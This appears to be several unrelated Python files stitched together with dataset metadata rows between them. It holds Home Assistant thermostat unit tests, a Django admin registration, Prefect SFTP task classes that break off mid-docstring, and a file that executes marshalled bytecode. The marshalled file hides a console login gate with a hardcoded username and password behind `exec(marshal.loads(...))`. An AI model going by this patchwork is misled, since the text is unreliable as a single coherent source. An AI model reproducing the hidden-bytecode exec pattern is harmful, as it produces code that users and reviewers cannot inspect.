state = self.hass.states.get(ENTITY)
self.assertEqual(MIN_TEMP, state.attributes.get('min_temp'))
self.assertEqual(MAX_TEMP, state.attributes.get('max_temp'))
self.assertEqual(TARGET_TEMP, state.attributes.get('temperature'))
def test_set_target_temp(self):
"""Test the setting of the target temperature."""
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(30.0, state.attributes.get('temperature'))
def test_sensor_bad_unit(self):
"""Test sensor that have bad unit."""
state = self.hass.states.get(ENTITY)
temp = state.attributes.get('current_temperature')
unit = state.attributes.get('unit_of_measurement')
self._setup_sensor(22.0, unit='bad_unit')
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(unit, state.attributes.get('unit_of_measurement'))
self.assertEqual(temp, state.attributes.get('current_temperature'))
def test_sensor_bad_value(self):
"""Test sensor that have None as state."""
state = self.hass.states.get(ENTITY)
temp = state.attributes.get('current_temperature')
unit = state.attributes.get('unit_of_measurement')
self._setup_sensor(None)
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(unit, state.attributes.get('unit_of_measurement'))
self.assertEqual(temp, state.attributes.get('current_temperature'))
def test_set_target_temp_heater_on(self):
"""Test if target temperature turn heater on."""
self._setup_switch(False)
self._setup_sensor(25)
self.hass.block_till_done()
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_heater_off(self):
"""Test if target temperature turn heater off."""
self._setup_switch(True)
self._setup_sensor(30)
self.hass.block_till_done()
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_on_within_tolerance(self):
"""Test if temperature change doesn't turn heater on within
tolerance.
"""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(29)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_on_outside_tolerance(self):
"""Test if temperature change turn heater on outside tolerance."""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_off_within_tolerance(self):
"""Test if temperature change doesn't turn heater off within
tolerance.
"""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(31)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_off_outside_tolerance(self):
"""Test if temperature change turn heater off outside tolerance."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(35)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatACMode(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'ac_mode': True
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_set_target_temp_ac_off(self):
"""Test if target temperature turn ac off."""
self._setup_switch(True)
self._setup_sensor(25)
self.hass.block_till_done()
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_ac_on(self):
"""Test if target temperature turn ac on."""
self._setup_switch(False)
self._setup_sensor(30)
self.hass.block_till_done()
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_off_within_tolerance(self):
"""Test if temperature change doesn't turn ac off within
tolerance.
"""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(29.8)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_set_temp_change_ac_off_outside_tolerance(self):
"""Test if temperature change turn ac off."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_on_within_tolerance(self):
"""Test if temperature change doesn't turn ac on within
tolerance.
"""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(25.2)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_on_outside_tolerance(self):
"""Test if temperature change turn ac on."""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatACModeMinCycle(unittest.TestCase):
"""Test the Generic Thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'ac_mode': True,
'min_cycle_duration': datetime.timedelta(minutes=10)
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_temp_change_ac_trigger_on_not_long_enough(self):
"""Test if temperature change turn ac on."""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_trigger_on_long_enough(self):
"""Test if temperature change turn ac on."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_trigger_off_not_long_enough(self):
"""Test if temperature change turn ac on."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_trigger_off_long_enough(self):
"""Test if temperature change turn ac on."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatMinCycle(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_cycle_duration': datetime.timedelta(minutes=10)
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_temp_change_heater_trigger_off_not_long_enough(self):
"""Test if temp change doesn't turn heater off because of time."""
self._setup_switch(True)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_trigger_on_not_long_enough(self):
"""Test if temp change doesn't turn heater on because of time."""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_trigger_on_long_enough(self):
"""Test if temperature change turn heater on after min cycle."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_trigger_off_long_enough(self):
"""Test if temperature change turn heater off after min cycle."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(True)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
| 38.679417
| 77
| 0.640075
| 2,618
| 21,235
| 4.953018
| 0.067227
| 0.069715
| 0.043109
| 0.056374
| 0.900671
| 0.885556
| 0.860492
| 0.826637
| 0.799799
| 0.784761
| 0
| 0.013071
| 0.247045
| 21,235
| 548
| 78
| 38.75
| 0.797924
| 0.123334
| 0
| 0.773171
| 0
| 0
| 0.070564
| 0.010081
| 0
| 0
| 0
| 0
| 0.192683
| 1
| 0.12439
| false
| 0
| 0.021951
| 0
| 0.158537
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c8475b2bd5948c05b213222fa506ea5a494fa40
| 108
|
py
|
Python
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 23
|
2020-02-28T14:29:04.000Z
|
2021-12-23T20:50:54.000Z
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 172
|
2020-02-24T12:12:11.000Z
|
2022-03-29T03:08:24.000Z
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 1
|
2020-11-23T22:42:20.000Z
|
2020-11-23T22:42:20.000Z
|
from .extended import ExtendedTestModel
class DependencyInhertanceTestModel(ExtendedTestModel):
pass
| 15.428571
| 55
| 0.833333
| 8
| 108
| 11.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 6
| 56
| 18
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7c91cd3d5d3b8cbd42c3d7319a68397e3a3119c4
| 4,508
|
py
|
Python
|
Noprian/Noprian-enc/.password.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
Noprian/Noprian-enc/.password.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
Noprian/Noprian-enc/.password.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00s\xed\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00e\x02\x00j\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x02\x00\x84\x00\x00Z\x06\x00e\x06\x00d\x03\x00\x83\x01\x00\x01e\x06\x00d\x04\x00\x83\x01\x00\x01e\x06\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHd\x06\x00GHd\x04\x00GHd\x04\x00GHd\x07\x00Z\x07\x00d\x08\x00Z\x08\x00d\t\x00\x84\x00\x00Z\t\x00d\n\x00\x84\x00\x00Z\n\x00y\x0b\x00e\n\x00\x83\x00\x00\x01Wn%\x00\x04e\x0b\x00k\n\x00r\xe8\x00\x01\x01\x01e\x00\x00j\x0c\x00d\x0b\x00\x83\x01\x00\x01e\t\x00\x83\x00\x00\x01n\x01\x00Xd\x01\x00S(\x0c\x00\x00\x00i\xff\xff\xff\xffNc\x01\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x84\x00\x00\x00i\x06\x00d\x01\x00d\x02\x006d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006d\x0b\x00d\x0c\x006}\x01\x00x,\x00|\x01\x00D]$\x00}\x02\x00|\x00\x00j\x00\x00d\r\x00|\x02\x00\x16d\x0e\x00|\x01\x00|\x02\x00\x19\x16\x83\x02\x00}\x00\x00q7\x00W|\x00\x00d\x0f\x007}\x00\x00|\x00\x00j\x00\x00d\x10\x00d\x0f\x00\x83\x02\x00}\x00\x00|\x00\x00GHd\x00\x00S(\x11\x00\x00\x00Ni\x1f\x00\x00\x00t\x01\x00\x00\x00mi \x00\x00\x00t\x01\x00\x00\x00hi!\x00\x00\x00t\x01\x00\x00\x00ki"\x00\x00\x00t\x01\x00\x00\x00bi#\x00\x00\x00t\x01\x00\x00\x00pi$\x00\x00\x00t\x01\x00\x00\x00cs\x03\x00\x00\x00\r%ss\x07\x00\x00\x00\x1b[%s;1ms\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00\r0(\x01\x00\x00\x00t\x07\x00\x00\x00replace(\x03\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00wt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00tampil\x07\x00\x00\x00s\x0c\x00\x00\x00\x00\x010\x01\r\x01"\x01\n\x01\x12\x01s\xdb\x00\x00\x00\rh\n ___ ___ _ _ \n | __| | _ ) | || | \rk*\rcAsecC|~|eror404\n | _| | _ \\ | __ | \n _|_|_ |___/ |_||_| \n \rp |"""""|| """ |\rmHaxID\rp|"""""||"""""| \n "`-0-0-\'"`-0-0-\'"`-0-0-\' t\x00\x00\x00\x00s1\x00\x00\x00\x1b[36;1mSilahkan Masukkan Username & Password Andas4\x00\x00\x00\x1b[36;1matau silahkan Hubungi \x1b[31;1mAsecC|~|eror404 t\x05\x00\x00\x00AsecCt\x07\x00\x00\x00eror404c\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01d\x00\x00S(\x01\x00\x00\x00N(\x05\x00\x00\x00t\x03\x00\x00\x00syst\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argv(\x01\x00\x00\x00t\x07\x00\x00\x00ngulang(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x07\x00\x00\x00restart\'\x00\x00\x00s\x04\x00\x00\x00\x00\x02\t\x02c\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00t\x01\x00k\x02\x00rN\x00t\x00\x00d\x02\x00\x83\x01\x00}\x01\x00|\x01\x00t\x02\x00k\x02\x00rA\x00d\x03\x00Gt\x03\x00j\x04\x00\x83\x00\x00\x01qX\x00d\x04\x00GHd\x05\x00GHn\n\x00d\x06\x00GHd\x07\x00GHd\x00\x00S(\x08\x00\x00\x00Ns\x12\x00\x00\x00\x1b[32;1mUsername : s\x12\x00\x00\x00\x1b[31;1mPassword : s\x17\x00\x00\x00\x1b[1;32mLogin berhasil..s8\x00\x00\x00\x1b[1;32mMaaf password yang anda masukan salah... [?]\x1b[00ms\x18\x00\x00\x00Silahkan Coba lagi...!!\ns8\x00\x00\x00\x1b[1;32mMaaf username yang anda masukan salah... [?]\x1b[00ms\x1f\x00\x00\x00\x1b[31;1mSilahkan Coba lagi...!!\n(\x05\x00\x00\x00t\t\x00\x00\x00raw_inputt\x08\x00\x00\x00usernamet\x08\x00\x00\x00passwordR\x0e\x00\x00\x00t\x04\x00\x00\x00exit(\x02\x00\x00\x00t\x05\x00\x00\x00unamet\x03\x00\x00\x00pwd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x04\x00\x00\x00main/\x00\x00\x00s\x14\x00\x00\x00\x00\x02\x0c\x02\x0c\x02\x0c\x04\x0c\x02\x04\x02\r\x06\x05\x02\x08\x08\x05\x02t\x05\x00\x00\x00clear(\r\x00\x00\x00R\x10\x00\x00\x00R\x0e\x00\x00\x00t\x04\x00\x00\x00timet\x06\x00\x00\x00randomt\x05\x00\x00\x00sleept\x08\x00\x00\x00platformR\n\x00\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x14\x00\x00\x00R\x1b\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptt\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s.\x00\x00\x00\x18\x01\x0c\x01\x0c\x01\x0c\x01\t\x01\x18\x01\t\x08\x03\x06\x07\x01\n\x01\n\x02\x05\x02\x05\x02\x05\x02\x05\x02\x06\x02\x06\x04\t\x08\t%\x03\x02\x0b\x02\r\x02\r\x02'''))
| 2,254
| 4,493
| 0.732697
| 953
| 4,508
| 3.440714
| 0.161595
| 0.353156
| 0.203111
| 0.128088
| 0.353156
| 0.264105
| 0.174748
| 0.139677
| 0.132357
| 0.122598
| 0
| 0.383371
| 0.026176
| 4,508
| 2
| 4,493
| 2,254
| 0.363554
| 0
| 0
| 0
| 0
| 0.5
| 0.990464
| 0.924817
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 13
|
7ca30904334758be188e88d77333404500f838b9
| 164
|
py
|
Python
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Account, Category, Connection, Transaction
admin.site.register((Account, Category, Connection, Transaction))
| 27.333333
| 65
| 0.810976
| 19
| 164
| 7
| 0.631579
| 0.225564
| 0.37594
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103659
| 164
| 5
| 66
| 32.8
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7ccd23c853f32281523e16d82fd560482d1c89f5
| 8,048
|
py
|
Python
|
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
import os.path
import contextlib
from typing import Optional
from paramiko import Transport, SFTPClient, SFTPError
from prefect import Task
from prefect.utilities.tasks import defaults_from_attrs
class SftpDownload(Task):
"""
Task for downloading files from an SFTP server.
Downloads remote file into sftp_downloads/ folder by default.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to download file to.
- **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor.
Raises:
- ValueError: Raised if a required parameter is not supplied.
- ClientError: Raised if exception occurs when connecting/downloading from the server.
"""
def __init__(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
**kwargs,
):
self.host = host
self.username = username
self.password = password
self.port_number = port_number
self.remote_path = remote_path
self.local_path = local_path
super().__init__(**kwargs)
def _create_connection(self) -> Optional[SFTPClient]:
"""
Initialize the connection with the SFTP server.
:return: Optional[SFTPClient]
"""
transport = Transport(sock=(self.host, self.port_number))
transport.connect(username=self.username, password=self.password)
# self._connection = SFTPClient.from_transport(transport)
connection = SFTPClient.from_transport(transport)
self.logger.info(f"connected to {self.host}, {self.port_number}")
return connection
def file_exists(self, remote_path: str, conn: SFTPClient):
"""
Checks if file exists in remote path or not.
Args:
- remote_path (str): Remote file path to check if file exists.
- conn (SFTPClient): The connection object for the SFTP server.
"""
try:
self.logger.info(f"remote path : {remote_path}")
conn.stat(remote_path)
except SFTPError as e:
self.logger.debug(
f"The specified file on this '{remote_path}' remote_path does not exist."
)
raise e
@defaults_from_attrs(
"host", "username", "password", "port_number", "remote_path", "local_path"
)
def run(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
):
"""
Task for downloading files from an SFTP server.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to download file to.
Raises:
- ValueError: Raised if a required parameter is not supplied.
- ClientError: Raised if exception occurs when connecting/downloading from the server.
"""
if not host:
raise ValueError("A host name must be provided")
if not username:
raise ValueError("User name must be provided")
if not password:
raise ValueError("A password must be provided")
if not port_number:
raise ValueError("A port_number name must be provided")
if not remote_path:
raise ValueError("A remote_path must be provided")
# set default to local path if arg not provided
self.local_path = (
"sftp_downloads/" + remote_path.split("/")[-1]
if local_path is None
else local_path
)
# check if local path exists or not
local_dir = "/".join(self.local_path.split("/")[:-1]) + "/"
if not os.path.isdir(local_dir):
os.mkdir(local_dir)
with contextlib.closing(self._create_connection()) as conn:
self.file_exists(remote_path, conn)
conn.get(remote_path, local_path, callback=None)
class SftpUpload(Task):
"""
Task for uploading files to an SFTP server.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port number to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to from upload.
- **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor.
Raises:
- ValueError: Raised if a required parameter is not supplied.
- ClientError: Raised if exception occurs when connecting/uploading to the server.
"""
def __init__(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
**kwargs,
):
self.host = host
self.username = username
self.password = password
self.port_number = port_number
self.remote_path = remote_path
self.local_path = local_path
super().__init__(**kwargs)
def _create_connection(self) -> Optional[SFTPClient]:
"""
Initialize the connection with the SFTP server.
:return: Optional[SFTPClient]
"""
transport = Transport(sock=(self.host, self.port_number))
transport.connect(username=self.username, password=self.password)
connection = SFTPClient.from_transport(transport)
self.logger.info(f"connected to {self.host}, {self.port_number}")
return connection
@defaults_from_attrs(
"host", "username", "password", "port_number", "remote_path", "local_path"
)
def run(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
):
"""
Task for uploading files to an SFTP server.
Args:
